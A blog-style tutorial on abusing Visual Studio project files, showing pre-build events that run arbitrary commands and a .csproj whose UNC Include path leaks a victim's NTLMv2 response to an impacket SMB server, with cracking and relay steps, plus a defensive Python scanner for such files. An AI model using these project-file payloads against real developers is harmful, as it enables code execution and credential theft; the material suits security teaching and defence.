- [[#1) Introduction|1) Introduction]]
  - [[#1) Introduction#1.1) Setup Visual Studio|1.1) Setup Visual Studio]]
- [[#2) Exploiting|2) Exploiting]]
  - [[#2) Exploiting#2.1) Remote Code Execution|2.1) Remote Code Execution]]
  - [[#2) Exploiting#2.2) NTLMv2 Theft|2.2) NTLMv2 Theft]]

## 1) Introduction

In this blog we're going to talk about two sneaky tricks that can be pulled with Visual Studio: getting the victim's machine to run attacker-controlled code, and stealing the victim's Windows login credentials, just by getting them to open (and, for the first trick, build) a project the attacker controls. We'll see how the build process (the steps your computer takes to turn your code into a working program) can be tinkered with to make it do things it's not supposed to, and we'll look at a technique called NTLMv2 theft, which captures the challenge/response that Windows sends when it authenticates to a file share so that it can be cracked or relayed.

This might sound complicated, but don't worry, I'll explain everything step by step. By the end of the post you'll understand how both tricks work and what to look for in a project file before you open it. So, whether you're a coding expert or just starting out, I hope you'll find this post both interesting and helpful. Let's get started!
### 1.1) Setup Visual Studio

Start by running the following PowerShell commands to download and install Visual Studio on your Windows VM (the `--wait` flag keeps the bootstrapper in the foreground until the install finishes; without it the command returns immediately while the installer keeps running):

```powershell
Write-Host "[+] Installing Visual Studio Community"

# Download the Visual Studio Community bootstrapper
Invoke-WebRequest https://aka.ms/vs/17/release/vs_community.exe -UseBasicParsing -OutFile C:\Windows\Temp\vs_community.exe

# Install the .NET desktop development workload
# https://docs.microsoft.com/en-us/visualstudio/install/workload-component-id-vs-community?view=vs-2022&preserve-view=true#net-desktop-development
C:\Windows\Temp\vs_community.exe --add Microsoft.VisualStudio.Workload.ManagedDesktop --installPath "C:\Program Files\Microsoft Visual Studio\2022\Community" --addProductLang en-US --includeRecommended --passive --wait
```

---

## 2) Exploiting

### 2.1) Remote Code Execution

One of the primary methods to execute commands during the build process is to use pre-build and post-build events, a build feature of Visual Studio and MSBuild. These events run custom commands at specific stages of the build. Let's take a look at an example .csproj file:

```xml
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <PreBuildEvent>calc.exe</PreBuildEvent>
  </PropertyGroup>
</Project>
```

This .csproj file specifies the project's properties and build settings. Within the `<PropertyGroup>` element we find the `<PreBuildEvent>` element, which holds a command to execute before compilation starts. Pre-build and post-build events follow the same pattern:

```xml
<PreBuildEvent>{command}</PreBuildEvent>
<PostBuildEvent>{command}</PostBuildEvent>
```

- The `<PreBuildEvent>` element defines the command or series of commands to execute before the build begins.
- The `<PostBuildEvent>` element defines the command or series of commands to execute after the build has completed.

In the example above, the command `calc.exe` is specified as the pre-build event. Nothing restricts what goes in these elements: the command is handed to `cmd.exe`, so anything you can type at a command prompt, including a PowerShell reverse-shell one-liner, runs with the privileges of the user doing the build. Two practical points worth knowing:

- Build events only fire when the project is actually built (for example F5 or Ctrl+Shift+B). Simply opening the solution does not trigger them, which is why the credential-theft trick in 2.2 is the more reliable "open the project and you're done" primitive.
- MSBuild evaluates properties before the SDK's targets are imported, so macros such as `$(ProjectDir)` may be empty inside these properties in SDK-style projects. Visual Studio itself now writes build events as a `<Target>` element containing an `<Exec>` task for this reason. A bare command such as `calc.exe` works in both forms, and anyone reviewing a project file should look for `<Exec>` tasks as well as the two properties.

Example output:

![[Pasted image 20230608175053.png]]

### 2.2) NTLMv2 Theft

When it comes to stealing NTLMv2 credentials, we can abuse the `Include` attribute in the .csproj file, and this one fires as soon as the solution is opened in Visual Studio. `Include` specifies the file name or path of an item that is part of the project; it is what determines which files, directories and resources belong to the project's overall structure. It is used on many item elements in the .csproj file, such as `<Compile>`, `<Content>`, `<None>` and `<EmbeddedResource>`, depending on the type of item being included. Here's a normal example:

```xml
<ItemGroup>
  <Compile Include="MyClass.cs" />
  <Content Include="Readme.txt" />
  <None Include="Enox.txt"/>
</ItemGroup>
```

Why does this leak credentials? When Visual Studio loads the project it evaluates every item and checks whether the referenced file exists. If `Include` points at a UNC path (`\\host\share\file`), that check makes Windows connect to the SMB share, and the Windows SMB client authenticates to the server automatically with the logged-on user's credentials. The server never has to be legitimate: the client sends the NTLMv2 challenge/response to whatever is listening.

You can use tools like [Responder](https://github.com/lgandx/Responder) or [impacket-smbserver](https://github.com/fortra/impacket/blob/master/examples/smbserver.py) to play the rogue server. Once the solution is opened in Visual Studio, the authentication attempt is directed to our attacker-controlled SMB server, which records the NTLMv2 authentication data. Note that what is captured is the Net-NTLMv2 challenge/response, not the user's NT hash: it cannot be used for pass-the-hash, but it can be cracked offline or relayed while the session is live.
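Because both tricks live in plain XML, the cheapest defence is to look at a project file before Visual Studio does. The scanner below is an added example written for this post (it is not code from the original post, from Outflank or from Microsoft). It flags the build-event properties from 2.1, any `<Exec>` task inside a `<Target>`, and any UNC path (`\\host\share` or `//host/share`) in an attribute such as `Include` or `Import Project`, which is the 2.2 vector. The two sample project files at the bottom are constructed for the demonstration; the host `172.16.128.129` and share name `enox` are taken from this post, and `10.0.0.5` is made up.

```python
"""Scan MSBuild project files (.csproj/.vbproj/.props/.targets) for the two
Visual Studio abuse primitives described in this post before anyone opens them:
  1. commands that run at build time (PreBuildEvent/PostBuildEvent properties
     and <Exec> tasks inside <Target> elements), and
  2. UNC paths in attributes such as Include or Import Project, which make
     Visual Studio touch a remote SMB share on project load and can leak
     the user's NTLMv2 challenge/response.
Usage: python scan_csproj.py path/to/project.csproj [more files...]
"""
import re
import sys
import xml.etree.ElementTree as ET

# Old-style (non-SDK) project files declare this namespace; SDK-style ones do not.
MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
BUILD_EVENT_PROPS = {"PreBuildEvent", "PostBuildEvent"}
# \\host\share\... or //host/share/... (MSBuild accepts forward slashes too).
UNC_RE = re.compile(r"^\s*(\\\\|//)[^\\/]+[\\/]")


def _local(tag):
    """Strip an XML namespace from a tag: '{ns}Compile' -> 'Compile'."""
    return tag.rsplit("}", 1)[-1]


def scan_project_xml(text):
    """Return a list of (kind, detail) findings for one project file's XML.

    kind is 'build_event', 'exec_task' or 'unc_path'; findings are in
    document order so the reader can map them back to the file.
    """
    findings = []
    root = ET.fromstring(text)
    for elem in root.iter():
        tag = _local(elem.tag)
        body = (elem.text or "").strip()
        if tag in BUILD_EVENT_PROPS and body:
            findings.append(("build_event", f"<{tag}> runs: {body}"))
        elif tag == "Exec":
            findings.append(("exec_task", f"<Exec> runs: {elem.get('Command', '')}"))
        for attr, value in elem.attrib.items():
            # Include/Exclude/Project values may be ';'-separated lists.
            for part in value.split(";"):
                if UNC_RE.match(part):
                    findings.append(("unc_path", f"<{tag} {attr}> -> {part.strip()}"))
    return findings


def scan_file(path):
    """Scan one project file on disk (utf-8-sig tolerates the BOM VS writes)."""
    with open(path, encoding="utf-8-sig") as fh:
        return scan_project_xml(fh.read())


# --- constructed samples for the demonstration (not from the original post) ---
BENIGN = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net6.0</TargetFramework></PropertyGroup>
  <ItemGroup><Compile Include="MyClass.cs" /><None Include="Readme.txt" /></ItemGroup>
</Project>"""

# SDK-style project combining the 2.1 and 2.2 primitives plus an <Exec> target.
SUSPICIOUS = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>calc.exe</PreBuildEvent>
  </PropertyGroup>
  <ItemGroup>
    <None Include="\\\\172.16.128.129\\enox\\app.config" />
  </ItemGroup>
  <Target Name="AfterBuildHook" AfterTargets="Build">
    <Exec Command="powershell -nop -w hidden -c whoami" />
  </Target>
</Project>"""

# Old-style project with the MSBuild namespace and a UNC <Import>.
OLD_STYLE = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Import Project="\\\\10.0.0.5\\share\\Build.props" />
  <PropertyGroup><PostBuildEvent>echo done</PostBuildEvent></PropertyGroup>
</Project>"""


if __name__ == "__main__":
    for path in sys.argv[1:]:
        for kind, detail in scan_file(path):
            print(f"{path}: [{kind}] {detail}")
```

Run it over every `*.csproj`, `*.props` and `*.targets` file in a repository you did not write before opening the solution; an empty result does not prove the project is safe (MSBuild has other ways to run code), but any hit deserves a look before you press F5.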
Step by step:

1) Set up the SMB server on the attacker machine (share name `enox`, serving the current directory, with SMB2 enabled so modern Windows clients will talk to it):

```bash
impacket-smbserver enox . -smb2support
```

2) Update the .csproj to the following:

```xml
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
  <ItemGroup>
    <None Include="\\172.16.128.129\enox\app.config" />
  </ItemGroup>
</Project>
```

The part responsible for forcing the NTLMv2 authentication is the UNC path in `Include`; the file does not need to exist on the share, because the authentication happens before the server answers whether it is there:

```xml
<ItemGroup>
  <None Include="\\172.16.128.129\enox\app.config" />
</ItemGroup>
```

3) Once the solution is opened by the victim, we get their NTLMv2 challenge/response:

![[Pasted image 20230608180036.png]]

- The captured NTLMv2 response can be cracked offline (hashcat mode 5600) or relayed with [impacket-ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py). Relaying only works against targets that do not require SMB signing (or against other protocols with their own relay constraints), and it has to happen while the victim's connection is live, so ntlmrelayx should be listening instead of smbserver when relay is the goal.

---

References:

- https://outflank.nl/blog/2023/03/28/attacking-visual-studio-for-initial-access/
- https://www.r-tec.net/r-tec-blog-when-hackers-hack-the-hackers.html